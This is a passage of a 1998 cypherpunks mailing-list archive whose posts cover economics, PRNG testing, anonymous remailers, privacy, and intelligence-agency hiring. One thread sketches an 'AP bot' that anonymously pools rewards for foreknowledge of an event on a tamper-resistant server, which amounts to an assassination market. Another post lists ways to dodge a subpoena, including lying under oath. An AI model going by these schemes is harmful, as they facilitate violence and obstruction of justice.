so much as it chooses to break free of the unhealthy body to which it belongs.
The growth of the
cancerous cell deprives the healthy cells of nourishment and ultimately
kills both the body and itself. Capitalism does much the same to the
societies it infests.
Mutation is the basis for evolutionary advance.
One reason we fail to recognise the seriousness of
our predicament is
because we fail to see how capitalism is destroying the world's real
wealth. It destroys social capital when it breaks up unions,
Like we need another layer of government in the work place. This is the
mantra of the rainbow coalition, isn't it? Unions as in sexual union, you
come together until you achieve 'le petit mort', then you roll apart. Its
pathetic to try to prolong it any further. Once you've achieved your goal,
why do you need the union?  Perhaps the dominance game is the goal?
bids down wages, and treats workers as expendable
commodoties,
In a truly free market, there are no wage slaves that don't choose to be.
leaving society to
absorb the family and community breakdown and violence that are inevitable
consequences. It destroys institutional capital when it undermines
the
function of governments and democracy by weakening environmental health
and
labour standards, and extracting public subsidies, bailouts and tax
exemptions which inflate corporate profits while passing the burdens
of
risk to governments and the working poor.
Institutional capital? hasn't this already been replaced by IOUs?
We arejust beginning to wake up to the fact that
the industrial era has in
a mere century consumed a consequential portion of the natural capital
it
took evolution millions of years to create. It is now drawing down
our
social, institutional and human capital as well.
The old zero-sum equation again.  If I make a profit, it had to have
been made at someone elses expense. Humans have, quite literally, only
scratched the surface,of the 'natural capital' of this planet. A bacterial
culture on a bowling ball.
Democracy and markets are wonderful ways of organising
the political and
economic life of a society to allocate resources fairly and
efficiently
while securing the freedom and sovereignty of the individual.
"Those who would sacrifice liberty for increased security, deserve, and
will receive, neither".
But modern capitalism is about using money to make
money for people who already have
more of it than they need.
According to who?
There's more, but I can feel the bile rising ...



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Bragg@ssa.co.uk
Date: Mon, 26 Oct 1998 18:22:35 +0800
To: vin@shore.net
Subject: Re: Irony
Message-ID: <802566A9.0034FA0B.00@seunt002e.ssa.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



The trouble is that most people think irony has something to do with metal!





vin@shore.net on 24/10/98 16:16:12

To:   cypherpunks@toad.com
cc:    (bcc: Richard Bragg/UK/SSA_EUROPE)
Subject:  Re: Irony




At 04:19 PM 10/23/98 +0200, Mok-Kong Shen wrote:
>>> Dear Friend,
>>
>>I don't know the English term but in my native language what is
>>described is call 'chaining letters', supposed to be a method to
>>become rich very rapidly. That was illegal, though.
At 6:10 PM -0400 10/23/98, Anonymous wrote:
>In my language we have something called humor, which some
>taxonomize with terms like irony, sarcasm, wit, etc.
     In Spanish, Italian, and Portuguese, we have this concept called
charity, which some taxonomize with terms like tolerance and benevolance.
Think of it as a reticence to be snide, petty, or sarcastic at the expense
of others.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Mon, 26 Oct 1998 17:21:08 +0800
To: David Honig <honig@sprynet.com>
Subject: Re: PRNGs and testers.
In-Reply-To: <19981021151835.A26267@krdl.org.sg>
Message-ID: <36343727.F2E8A921@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



David Honig wrote:
> 

> An experiment
> 
> Run a block cipher in a feedback mode, generating a large data file.
> Any good cipher will pass Diehard's tests for structure.  So will
> a true random file.
> 
> (I've posted directions for producing decent true randomness from
> a detuned FM radio, soundcard, and 8->1 parity-reduction filtering.)
> 
> Now run Maurer's test; I've posted a version for blocksize = 16.
> The cipher-PRNG output will not have the entropy expected for randomness.
> The physical-random file will.
>

I don't see you have answered my question of whether a test has to
take into consideration how a sequence of numbers has been obtained.
Also what you wrote above seems to be less than clear. Do you suggest
that Mauerer's test is extremely good in deciding whether a sequence 
is TRULY random? (I think Maurer's test is good for investigating 
PRNG squences but maybe not used as a criterion between pseudo-
randomness and true randomness (whatever that may be defined)). 
What if some PRNGs pass Maurer's test?

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Bashinski <jbash@cisco.com>
Date: Tue, 27 Oct 1998 02:38:25 +0800
To: vznuri@netcom.com (\"Vladimir Z. Nuri\")
Subject: Re: anonymous remailers, network computer, singles sites, etc.
In-Reply-To: <199810260646.WAA24262@netcom13.netcom.com>
Message-ID: <19981026174929.3019.qmail@susan.cisco.com>
MIME-Version: 1.0
Content-Type: text/plain



OK, I can't resist this one...

> an interesting subset of anonymity is being
> used very intensely with online personals!!
> here's a sophisticated example
> 
> http://personals.swoon.com/e_personals/static/help.html#e-mail
> 
> they have a lot of info on how their site
> acts as a remailer for email messages.
> this is a very "slick" online magazine clearly showing
> huge amount of production cash which I personally
> haven't heard too much about. a bit risque for
> some peoples tastes, but very intriguing application
> of cyberspace one never would have dreamt up just a 
> few moons ago.

I think maybe you need to have your dreaming apparatus checked out.

As far as I know, the very *first* anonymous remailing system on the
Net, which was created long before there was a Cypherpunks list and long
before there was a Worldwide Web, was the anonymous posting/reply system
for alt.sex.bondage. It was quickly followed by systems for a few other
groups. Especially prominent among these were the anonymous contact
systems for alt.personals and alt.personals.bondage.

Actually, I may have the order wrong. In any case, the systems were
definitely well established by 1990, and I seem to remember them
starting up in around 1988. Since they also predate things like
DejaNews, and since my memory of those days is clouded by age and
general dissipation, it's would take some resarch to find out exactly
when they were set up, and I don't think I care to do it.

I believe that these systems were the inspiration for
anon@penet.fi. They sort of fell apart when the PENET remailer came into
being.

Of course, these weren't truly anonymous systems in the sense that the
Cypherpunks remailers are, or in the sense that Zero Knowledge is
setting up, but they were probably more secure than the remailing
services on most personals Web sites.

... and newspaper personal ad sections have been providing a similar
service with paper mail for longer than I've been alive. Probably for
centuries.

There's actually a closely related "identity escrow" application that I
expect to see soon, if it hasn't already been done. People who meet for
anonymous sexual encounters are putting themselves at increased risk of
assault, murder, and that sort of thing, but typically don't want to
tell their mothers where they'll be. A system that could be used, under
carefully controlled conditions, to find out who they were with when
they disappeared, would act as a deterrent and might provide a bit more
peace of mind.

                                        -- John B.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@pobox.com>
Date: Tue, 27 Oct 1998 05:38:24 +0800
To: "David R. Conrad" <drc@adni.net>
Subject: Re: Java applet security, exportability, Jon Postel haiku
In-Reply-To: <Pine.LNX.4.05.9810260937040.10525-100000@darwin.adni.net>
Message-ID: <v03102803b25a73d9df69@[17.202.40.158]>
MIME-Version: 1.0
Content-Type: text/plain



A few Java comments on David Conrad's <drc@adni.net> questions:

>
>As they go through the data entry process I collect bits of entropy from
>mouse and keyboard events in a java.security.SecureRandom object.

Java 1.1 lets you attach event handlers to every user-interaction
class. For example, you can watch mouse movement, mouse entry
and exit into your components, and character entry in all text fields.
You might try adding handlers and capturing mouse position and
the system clock. Each event, by itself, won't give you much
entropy (and, of course, they are highly correlated event-to-event),
but you should be able to get a bit or two from each event.

>
>... I was flabbergasted when I found out that jdk
>1.0 had no printing API and so our applet, if it should allow users to
>print, must be a 1.1 applet, and very few browsers have 1.1 support

Java 1.1 is real, and support is becoming available on all platforms.
The lack of a printing API in Java 1.0 was probably a good thing:
printing is hard to get right, especially in a cross-platform environment,
and waiting for a more mature AWT will avoid compatibility issues.
Since your customers use a browser, why not display the data and
have the browser handle the printing?

Martin Minow
minow@pobox.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Tue, 27 Oct 1998 04:29:55 +0800
To: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Subject: Re: PRNGs and testers.
In-Reply-To: <19981021151835.A26267@krdl.org.sg>
Message-ID: <3.0.5.32.19981026110933.007ba9a0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:47 AM 10/26/98 +0100, Mok-Kong Shen wrote:
>David Honig wrote:
>> Now run Maurer's test; I've posted a version for blocksize = 16.
>> The cipher-PRNG output will not have the entropy expected for randomness.
>> The physical-random file will.
>>
>
>I don't see you have answered my question of whether a test has to
>take into consideration how a sequence of numbers has been obtained.

A test measures only what it measures.

You never know if this is sufficient.

A sample of a non-random process may pass your tests
if they don't measure the right thing.

>Also what you wrote above seems to be less than clear. Do you suggest
>that Mauerer's test is extremely good in deciding whether a sequence 
>is TRULY random? (I think Maurer's test is good for investigating 

I only find it interesting that the test can distinguish between
the two data samples.  To the eye, or ear, or Diehard, they appear the same.

>What if some PRNGs pass Maurer's test?
>
>M. K. Shen

I'd find it surprising if any did, given what I described.

DH










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Mon, 26 Oct 1998 19:02:11 +0800
To: cypherpunks@cyberpass.net
Subject: Postition determination
Message-ID: <36344BB4.D8297266@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



I am told that GPS can only locate to about 100 meters but a refined
technique can do that to 0.5 meter. There seems to be a practically
useful method of somewhat different vein. See http://www.rfid.org

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Theodor.SCHLICKMANN@BXL.DG13.cec.be
Date: Mon, 26 Oct 1998 19:05:55 +0800
To: <cypherpunks@Algebra.COM>
Subject: Re: An amendment proposal...
In-Reply-To: <199810241750.MAA16681@einstein.ssz.com>
Message-ID: <WIN937-981026092240-60D8*/G=Theodor/S=SCHLICKMANN/OU=BXL/O=DG13/PRMD=CEC/ADMD=RTT/C=BE/@MHS>
MIME-Version: 1.0
Content-Type: text/plain



> Section 6.  The concept of individual privacy is hereby clearly recognized
>             as being held by all peoples. No agency of any civil, legal,
>             military, or executive authority may infringe this right 
> without
>             just cause. This right shall include all communications,
>             writings, storage media, and other technologies used in the
>             creation, execution, and storage. No authority within the
>             United States of America may prohibit the publishing of any
>             document or other media. The rights of ownership and copyright
>             shall be respected to the legal holder.

Your scope of privacy seems to be rather narrow. It is not only communication.
Privacy is also needed on public places (e.g., violated by face recognition systems), 
at work places (e.g.,violated by telephone tapping), for your body (e.g., endangered by 
abortion control),


Copyright protection is only one way of hiding subsidies to industry. The amount
of money which is sometimes claimed in relation to copyright violation is wishful thinking.
If copyright protection would work, then the value of sold products will be much less.
A very small number of people would buy the product for the regular price. On the other
hand with piracy, the market share is growing extremely fast. The current situation
is hypocritical, because industry wants both.

Theodor Schlickmann




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 27 Oct 1998 04:22:39 +0800
To: cypherpunks@toad.com
Subject: Rendering ( was MIB Subponeas )
Message-ID: <3634CE28.66CC@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> Protective intelligence programs are based on the idea that the risk of
> violence is minimized if persons with the interest, capacity and willingness
> to mount an attack can be identified and rendered harmless before they
> approach a protected person.

I'm all for reducing the risk of violence but...

Interest, capacity and willingness are insufficient when taken alone.

Collecting real names and addresses is, apparently, enough of a concrete
step to at least begin the "rendering" process. 

Through rendering we can provide many useful by-products including
fertilizer, soap, glue and a horrible stink downwind from the plant.

If an AP bot were renamed, for instance, a Collectively Rewarded Action
Program would it be as obvious a target? One could then post Action
Items and Action Rewards to it anonymously. Everything from cleaning the
litter off Rt 680 in Fremont to hosing Monsanto ( the foul-milk,
press-squashing, poison-cow BST boys ). Then what would be needed is
some sort of Eternity Service for an active server - detect tampering
and jump hosts.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 27 Oct 1998 04:21:43 +0800
To: cypherpunks@toad.com
Subject: Re: Word choice
Message-ID: <3634D08B.1E7D@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> How does this differ from the motives of your ordinary politician?
> 
> Post-revolution, will there be caliber limitations when hunting them?

Hunt all you want. The post-revolution utopia will be administered by
persons of the same mentality as those we have administering our
Democratic Republic now. They will use the same if not more advanced
techniques to acquire and maintain power. "Nature abhors a vacuum",
right?

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 27 Oct 1998 04:28:03 +0800
To: cypherpunks@Algebra.COM
Subject: Cameras in Public Places
Message-ID: <3634D422.79AD@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> Privacy is also needed on public places (e.g., violated by face 
> recognition systems)

These early systems have got to have some major problems. 

The appropriate way of dealing with them is to wait for some people to
be misidentified and then file suit against the municipality using the
equipment. Harassment, false arrest, invasion of privacy, abuse of
power, loss of reputation, loss of the ability to earn a living - take a
few of the cities for $10 or $20 million and they'll get the message
that they've been had by the SW vendors.

However much I like technology, it looks more and more like politics is
king. For now.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 27 Oct 1998 03:13:42 +0800
To: John Young <cypherpunks@toad.com
Subject: Re: MIB Subponeas
In-Reply-To: <199810241358.JAA15466@dewdrop2.mindspring.com>
Message-ID: <4.0.2.19981026110245.03e27250@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Things to say when the subpoena comes.

1.  "My mental and or physical condition makes it impossible for me to
travel to the location stated in the subpoena."

2.  "My religious belief (or philosophy fulfilling the same role in my life
that religion fulfills in the lives of believers) prevents me from telling
the truth under compulsion.

3.  "I suffer from a recognized social/affective disorder that prevents me
from obeying government orders."

4.  "If administered an oath, I will refuse to promise to tell the truth
but will instead reserve the right to lie."

5.  "I will have left the jurisdiction prior to my proposed testimony date
so you can fuck yourselves."

6.  "I have no knowledge of anything mentioned in the subpoena." 

7.  "Neither slavery nor involuntary servitude, except as punishment for
crime whereof the party shall have been duly convicted, shall exist within
the United States, or any place subject to their jurisdiction."  

8.  "As a committed believer in the independent rights of jurors, I intend
to inform any Grand or Petit juries that I encounter of their right to
judge the law, the facts, and the validity of all government actions."

9.  "I do not posses any government-issued photo ID and thus cannot travel
to the location stated in the subpoena. 

DCF  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 27 Oct 1998 06:18:00 +0800
To: "'cypherpunks@cyberpass.net>
Subject: RE: capitalism run amuck by Korton
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7AA3@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



David Korton wrote:
> exchange rates and stock markets into wild gyrations wholly 
> unrelated to any underlying economic reality. 

Who has both the motive to deny economic reality and the power to do so
in the short term?

> To understand what is happening we must educate ourselves 
> about the nature of money 

http://www.ecosystems.net/mgering/money.html

> we give to the institutions and people who control its 
> creation and allocation the power to decide whether we 
> shall live in prosperity or destitution.

Who controls it, how and why?

> Contrary to its claims, capitalism is showing itself to
> be the mortal enemy of democracy and the market. 

Capitalism and democracy have nothing to do with each other.

"capitalism is...the mortal enemy of ...the market."

"capitalism is...the mortal enemy of ...the [free] market."

"capitalism is...the mortal enemy of ...[free] market [capitalism]."

"capitalism is...the mortal enemy of ...[capitalism]."

Hmmm, there is a problem here.

"[Modern pseudo-]capitalism is the mortal enemy of [free] market
[capitalism]."

There, that works.

> Under capitalism, money rules. 

Money can't rule, it is not sentient. Who controls money?

> The challenge is to replace the global capitalist 
> economy with a properly regulated ...economy 

> United Nations, as the protection of people and 
> communities from predatory global corporations 
> and finance

I can't believe after 69 years people are still shoveling the same
socialist and protectionist bullshit.

I cannot figure out how someone can get so close to pointing on the
problem with [modern] capitalism and still come to all the wrong
conclusions.

I've never seen populism and [free] market economics twisted together so
perversely.

     Matt


"I think you have to define what you mean by a free market.  
If you have a fiat currency, which is what everyone has in the 
world --- ...That is not a free market.  Central banks of 
necessity determine what the money supply is.  If you're on a 
gold standard or other mechanism in which the central banks do 
not have discretion, then the system works automatically. " 
    --Federal Reserve Chairman, Alan Greenspan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jay T. Lee" <jay.t.lee@ac.com>
Date: Tue, 27 Oct 1998 03:35:39 +0800
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199810261855.SAA14526@charon.pjm.com>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 27 Oct 1998 04:40:23 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Uncle Sam Wants Spooks.
Message-ID: <v04020a26b25a784deb29@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Mon, 26 Oct 1998 09:31:49 -0600
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Uncle Sam Wants Spooks.
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com
Status: U

Source:  Wired
http://www.wired.com/news/news/politics/story/15816.html

Uncle Sam Wants Spooks
 by Arik Hesseldahl

 4:00 a.m.26.Oct.98.PST
 With the Cold War over and United States
 intelligence agencies in flux, both the Central
 Intelligence Agency and the National Security
 Agency have begun to struggle with an issue
 plaguing the private sector: how to hire and
 retain talented employees.

 In a world that increasingly uses computer
 networks to communicate and transfer
 information, the agencies are specifically looking
 for people who can navigate the Net and other
 networks.

 The CIA launched the most ambitious hiring
 program in the agency's history earlier this year,
 and it is expected to hire record numbers of
 case officers between now and 2005.

 Along with a new, Java-heavy recruiting section
 on the agency's home page, the agency is
 advertising widely in magazines like The
 Economist and recruiting on college campuses
 and within the military.

 "Our recruiting efforts are much more focused
 than they have been in recent years and we have
 a better idea of our target audience," said CIA
 spokeswoman Anya Gilsher. "We're facing
 increasingly difficult challenges like terrorism,
 mass destructive weapons, and narcotics.
 These are all very difficult targets, which require
 innovative approaches and a talented work
 force."

 Computer programmers and engineers are as in
 demand in the intelligence business as they are
 in any other industry, Gilsher said.

 "We're looking for people who can deal with
 different computer systems and software.
 Someone who is creative in their ability to
 handle and manipulate information technology
 and build programs that could be useful to us,"
 she said.

 While Gilsher would not go into specifics, an
 article in The New York Times in June suggests
 that the proliferation of computer networks
 around the globe has, for example, complicated
 the ability of agents to slip in and out of
 countries covertly using fake passports.

 It's a different story for the National Security
 Agency, the country's super-secret signals
 intelligence agency. In an unusually candid
 series of answers to written questions, the NSA
 said it is struggling with one of the same issues
 plaguing the private sector: employee retention.

 A recent article in the magazine Government
 Executive said the agency is suffering a "brain
 drain," losing some of its best code-makers and
 code-breakers to the private sector. In a written
 statement, NSA spokesman Patrick Weadon
 confirmed that the agency is working harder than
 it has in the past to attract and keep its
 employees.

 "NSA, like most of the nation's IT community,
 has had significant challenges in hiring and
 retaining IT personnel," Weadon wrote. "Having
 said that, NSA has been successful attracting
 computer professionals with the stimulating
 nature of the work, student programs, and the
 total benefits package."

 The NSA also happens to be the country's
 single-biggest employer of mathematicians, and
 expects to hire more than 100 Ph.D.-level
 mathematicians in the next three years.

 Like the CIA, the NSA has launched a
 recruitment Web page, which has attracted 20
 percent of its recent resumes. The NSA also
 posts its job openings on employment Web
 sites like Job Web and Career Mosaic.

 The agency has been aggressively marketing
 itself to students, offering several internship
 programs. One program gives college juniors 12
 weeks of summer work experience, after which
 they return to school for their senior year with a
 job offer in hand. Another program allows college
 students to alternate working for the agency and
 going to school each semester.

 Some personnel also qualify for a fully funded
 graduate studies program, during which they can
 go to school full time for a year and still earn a
 salary, provided they commit to work for NSA for
 three years.

 NSA employees aren't likely to take jobs for the
 money, however. Computer science jobs at the
 NSA pay between US$35,000 and $70,000 a
 year, much less than in the private sector.

 "IT professionals seek out the NSA due to the
 unique nature of our work," Weadon wrote. "This
 has made us successful in attracting computer
 professionals over the past several years, and
 we believe this appeal will continue into the
 future."

 Not everyone agrees. Steve Aftergood, a
 research analyst for the Federation of American
 Scientists, said the allure of working in the
 intelligence community is wearing thin.

 "The intelligence agencies have an unattractive
 air about them," Aftergood said. "They have an
 aura of failure about them, especially in recent
 years. Rightfully or wrongly, they have been
 attacked as incompetent and even obsolete.
 Those charges may or may not be true, but they
 cast a long shadow over the agencies in the
 public mind."

 In recent years, the CIA has faced its share of
 problems within and criticisms from without. This
 year, for example, the agency was criticized for
 not having predicted nuclear weapons tests by
 India and Pakistan. In 1994, CIA employee
 Aldrich Ames was caught after revealing the
 identities of CIA operatives in the Soviet Union
 over the course of nine years. For its part, the
 NSA has been criticized for its efforts to keep
 strong encryption systems out of the hands of
 private citizens.

 Both the CIA and NSA still maintain a
 technological edge over the private sector, but
 Aftergood said that lead is shrinking.

 "The reality is that the private sector now
 competes in many areas that used to be the
 exclusive domain of the intelligence agencies,"
 he said, citing encryption, computer software
 implementation, and analysis of foreign military
 and economic conditions as examples.

 The schools that train the spies and intelligence
 analysts of the future are placing a new
 importance on learning to use the Net and other
 online resources to get the job done. Robert
 Heibel, director of the Research/Intelligence
 Analyst Training Program at Mercyhurst College
 in Erie, Pennsylvania, said students get a
 thorough exposure to the Net and computers in
 general.

 The program trains students to "drink from the
 firehose," to glean important nuggets of
 information as tools for decision makers, Heibel
 said.

 Graduates of the program have gone on to
 become analysts for the CIA, NSA, FBI and
 other agencies swimming in the intelligence
 community's alphabet soup, he said.

 "We teach a concept called open source and
 public domain intelligence -- that is, taking what
 is in the public domain and creating new
 knowledge by analysis and interpretation," he
 said. "If you spend 20 percent of your
 intelligence budget on open source intelligence
 you'll be able to answer 70 percent of the boss's
 questions."

 Applying for a job with the CIA is easy: Send a
 resume. The CIA scans the resumes it gets
 using optical character recognition technology.
 An applicant for either agency must also submit
 to a thorough background investigation, a
 polygraph test, and medical and psychological
 examinations, said Gilsher, who went through
 the process herself. The process currently takes
 five to six months, but the agency is hoping to
 shorten that to three or four months, she said.

 Copyright (c) 1994-98 Wired Digital Inc. All rights reserved.
----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Tue, 27 Oct 1998 04:17:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: MIB Subponeas
In-Reply-To: <199810241358.JAA15466@dewdrop2.mindspring.com>
Message-ID: <3.0.3.32.19981026144314.038c6020@rboc.net>
MIME-Version: 1.0
Content-Type: text/plain



At 01:15 PM 10/26/98 -0500, Duncan Frissell wrote:
>9.  "I do not posses any government-issued photo ID and thus cannot travel
>to the location stated in the subpoena. 

ROTFLMAO...

This last one is too funny to not use.  I don't have a subpoena, but I can
just see myself writing back explaining this and requesting assistance with
a plane flight to solve this problem.


  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Mon, 26 Oct 1998 10:20:40 +0800
To: cypherpunks@cyberpass.net
Subject: TriSnakeoil questions
Message-ID: <90936671031620@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



I'm currently sitting in a booth at a Tandem user show directly
opposite the Atalla one.  If there's anything in particular which
someone wants to ask them, let me know and I'll see how 
knowledgeable their salesdroids are.  Dunno how reliable my 
access to mail will be in the next day or two, if you're local
you could try calling me at the hotel I'm staying, which is the
Fairmont in San Jose (although you've got a whelks chance in a
supernova of actually catching me in my room, so you'll probably
have to leave a message).

Peter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 27 Oct 1998 07:52:38 +0800
To: cypherpunks@toad.com
Subject: Re: Rendering ( was MIB Subponeas )
In-Reply-To: <6ef52a1a.3634f180@aol.com>
Message-ID: <36350081.157B@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



(Mr/Mrs/Ms) Hack,

Many thanks in advance for your generous and gracious assistance.

Please tell me where I've headed off the proper path.

Without having read any detailed descriptions I thought an AP bot might
do the following :

Form a token pool associated with some desired event.

Accept tokens from any source into that pool.

Transfer the entire pool of tokens to the entity that could demonstrate
foreknowledge of significant details of the actual event outcome.

Couldn't this be more general than just AP? Generalized it could be used
for any collectively rewarded effort but its main application looks like
anonymous conspiracy. This may be good, maybe not. What I was wondering
was if in a very generalized form the server might be "innocent," a mere
public bulletin board.

Also, couldn't a server like this be implemented as a distributed system
that could survive the destruction of some fraction of its body?

Again, I apologize for being slow but I do try.

Regards,
Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan Dobrucki <s1180@qmail.pjwstk.waw.pl>
Date: Tue, 27 Oct 1998 00:05:44 +0800
To: cypherpunks@cyberpass.net
Subject: I'm getting mail from people i never heard off...
Message-ID: <36349272.5E486C17@qmail.pjwstk.waw.pl>
MIME-Version: 1.0
Content-Type: text/plain



This is a weird one. It had nothing in the body of the message... so
what the heck can this all mean?
JD

Return-Path: 
                <Mohammed_Lazhar@cch-lis.com>
       Delivered-To: 
                s1180@qmail.pjwstk.waw.pl
         Received: 
                (qmail 26032 invoked from network); 22 Oct 1998
13:46:38 -0000
         Received: 
                from ny1.cch-lis.com (firewall-user@208.203.201.2) by
qmail.pjwstk.waw.pl with SMTP;
                22 Oct 1998 13:46:38 -0000
         Received: 
                by ny1.cch-lis.com; id BAA16396; Wed, 21 Oct 1998
01:11:42 -0400
         Received: 
                from notes(165.181.145.8) by ny1.cch-lis.com via smap
(4.1) id xmaa15665; Wed, 21 Oct
                98 01:08:39 -0400
         Received: 
                by notes.cch-lis.com(Lotus SMTP MTA SMTP v4.6 (462.2
9-3-1997)) id
                852566A4.001D343C ; Wed, 21 Oct 1998 01:18:59 -0400
 X-Lotus-FromDomain: 
                CCHLIS@LIS NET
            From: 
                "Mohammed Lazhar" <Mohammed_Lazhar@cch-lis.com>
              To: 
                Jan_Dobrucki_ <s1180@qmail.pjwstk.waw.pl>
       Message-ID: 
                <852566A4.001CE903.00@notes.cch-lis.com>
            Date: 
                Wed, 21 Oct 1998 01:15:46 -0400
           Subject: 
                Mohammed Lazhar is out of the office.
      Mime-Version: 
                1.0
       Content-type: 
                text/plain; charset=us-ascii
           Status: 
                O
    X-Mozilla-Status: 
                8003




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jkthomson <jkthomson@bigfoot.com>
Date: Tue, 27 Oct 1998 09:20:04 +0800
To: ILovToHack@aol.com
Subject: Re: Rendering (flame)
In-Reply-To: <6ef52a1a.3634f180@aol.com>
Message-ID: <3.0.3.32.19981026164112.00912100@dowco.com>
MIME-Version: 1.0
Content-Type: text/plain



At 05:02 PM 10/26/98 EST, you wrote:
>First of all i want to apoligize for posting this.
>Second i am a little off on the AP bot could some one please take the time to
>explain this to me.  Thanks.  
>-Mike

hey, dude...  how's that 'law suit' coming along?  I've been waiting a long
time for an answer from you, did you manage to get one in my size?


------------------------------------------------------------------
From: ILovToHack@aol.com
Date: Mon, 31 Aug 1998 18:10:37 EDT
To: jkthomson@bigfoot.com
Subject: Re:
X-Mailer: AOL 4.0 for Windows 95 sub 214

You post a message like that again and you will be sued for libel my screen
name is just a nic and by the way if you think i am jokeing about the law suit
try me

<Mike Haisley>
<ceo comnerd inc.>
<ILovToHack@aol.com>
--------------------------------------------------------------------

-----------------------------------------------------------------------
 james 'keith' thomson <jkthomson@bigfoot.com>  www.bigfoot.com/~ceildh
 jkthomson:C181 991A 405C EAFB 2C46 79B5 B1DC DB78 8196 122D [06.07.98]
 ceildh   :1D79 59AF ED75 5945 6003 8240 DA34 ACCA 9DE4 6BC9 [05.14.98]
 ICQ:354111 <keys> at pgp.mit.edu     ...and former sysop of tnbnog BBS
-----------------------------------------------------------------------
If you see a man approaching you with the obvious intention of doing
you good, you should run for your life.
=======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ILovToHack@aol.com
Date: Tue, 27 Oct 1998 07:07:33 +0800
To: cypherpunks@toad.com
Subject: Re: Rendering ( was MIB Subponeas )
Message-ID: <6ef52a1a.3634f180@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



First of all i want to apoligize for posting this.
Second i am a little off on the AP bot could some one please take the time to
explain this to me.  Thanks.  
-Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bellovin <smb@research.att.com>
Date: Tue, 27 Oct 1998 07:04:33 +0800
To: Vin McLellan <vin@shore.net>
Subject: log files (was: Re: dbts: Cryptographic Dog Stocks, The Dirigible Biplane, and Sending the Wizards Back to Menlo Park )
Message-ID: <199810262226.RAA12688@postal.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain



> 	It strikes me that while Mr. Hettinga and other e$ seers may have
> spent the past decade considering how to allow transactional exchanges to
> escape a human linkage, most professional sysops and network managers have
> been concerned with how to strengthen the linkage between on-line accounts,
> actions, and audit trails -- and the humans to which a user's account has
> been assigned.

Leaving aside the rest of this discussion, Vin touches on a point that
I think has been ignored by some:  operations demand log files.  That
